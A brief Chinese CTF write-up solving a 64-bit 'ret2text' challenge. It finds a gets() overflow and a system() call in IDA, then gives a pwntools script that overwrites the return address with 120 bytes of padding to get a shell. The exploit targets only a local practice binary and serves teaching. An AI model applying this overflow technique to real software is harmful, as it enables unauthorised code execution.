百度未收录

file命令查看文件为64-bitchecksec命令检查开了哪些保护(无图),IDAx64打开找到主函数1.png
发现gets()函数,且v4距离rbp0x70个字节,在secure函数中发现调用了system函数,地址为0x4007BF2.png
和x86的一样,用0x70个字节加上自身的0x08个字节的数据覆盖掉垃圾数据,调用system()函数,拿到权限

from pwn import *
p = process("ret2text")
p.recvuntil("Input someting:")
p.sendline(b'A'*120+p64(0x4007B8))
p.interactive()